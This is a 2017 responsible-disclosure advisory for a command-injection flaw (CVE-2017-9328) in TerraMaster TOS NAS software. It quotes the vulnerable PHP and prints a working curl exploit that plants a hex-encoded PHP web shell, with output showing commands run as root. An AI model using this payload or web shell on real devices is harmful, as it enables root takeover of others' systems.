Title: TOS Remote Code Execution Vulnerability
Advisory URL: https://gist.github.com/hybriz/63bbe2d963e531357aca353c74dd1ad5
Date published: 2017-09-13
Date of last update: 2017-09-13
Vendor: TerraMaster
Disclosure scheme: 60-day deadline Responsible Disclosure
State: Fixed.
Class: Improper Neutralization of Special Elements used in a Command [CWE-77]
Impact: Code execution as root
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2017-9328
A shell metacharacter injection vulnerability was found in a PHP file that leads to remote code execution as root.
This vulnerability has been confirmed and exploited successfully in the following versions of TOS:
- TOS <= 3.0.31
- TOS <= 2.515
- TOS <= 2.266
Vendor was contacted, vulnerability was reported and is now fixed in the beta release of TOS (3.0.34 onwards).
Possible mitigation involves disallowing network access to the web interface.
To fully correct this vulnerability one needs to upgrade to version 3.0.34 or higher.
Thanks to Simone Margaritelli (evilsocket) for pointing out the existence of this vendor and finding other vulnerabilities on TOS.
at the start of file "/usr/www/include/ajax/GetTest.php", one can see
<?php
include_once "../../include/app.php";
$data = $_POST;
$file = "/mnt/base/.".basename($data['dev'])."test";
if(!file_exists($file)) touch($file);
if(isset($data['testtype'])){//开始或者停止过程...
if($data['testtype'] != 'stop'){
$line = $data['dev'].':'.$data['testtype'].":".time();
shell_exec("echo -e \"".$line."\" > $file");
}
$return = smartscan($data['dev'],$data['testtype']);
the input used in the shell_exec() function is obviously not filtered well enough and thus allows for inserting shell commands.
as demonstration, the following 2 commands will exploit and confirm the presence of the issue.
Exploit:
curl 'http://IP-ADDRESS-OF-NAS:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n" > xploited.php);'
this will generate a file called "xploited.php" which runs arbitrary commands, as one can see in the console output below.
$ curl 'http://192.168.100.100:8181/include/ajax/GetTest.php' -X POST --data 'dev=b1bebe&testtype=start;\"$(echo -en "\\x3c\\x3f\\x70\\x68\\x70\\x20\\x70\\x61\\x73\\x73\\x74\\x68\\x72\\x75\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x69\\x22\\x5d\\x29\\x3b\\x20\\x3f\\x3e\\n" > xploited.php);'
<br />
<b>Fatal error</b>: Call to undefined function smartscan() in <b>/mnt/base/www/include/ajax/GetTest.php</b> on line <b>12</b><br />
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=ls -latr /mnt/base/www/include/ajax/xploited.php'
-rw-r--r-- 1 root root 35 Jun 20 16:29 /mnt/base/www/include/ajax/xploited.php
$ curl 'http://192.168.100.100:8181/include/ajax/xploited.php' -b 'i=id && uname -a && cat /proc/version'
uid=0(root) gid=0(root)
Linux Tnas-XXXXXX 2.6.31.8 #8 PREEMPT Sun Mar 16 16:51:41 CST 2014 armv5tel GNU/Linux
Linux version 2.6.31.8 (root@rds-02) (gcc version 4.3.2 (sdk3.2rc1-ct-ng-1.4.1) ) #8 PREEMPT Sun Mar 16 16:51:41 CST 2014
$
2017-06-20: Shared this advisory with vendor via provided support email
2017-06-22: Vulnerability acknowledged and information relayed to engineers
2017-09-07: Sent e-mail asking for news
2017-09-07: Beta version updated with fix (beta 3.0.34)
2017-09-08: Vendor replied with link to patched version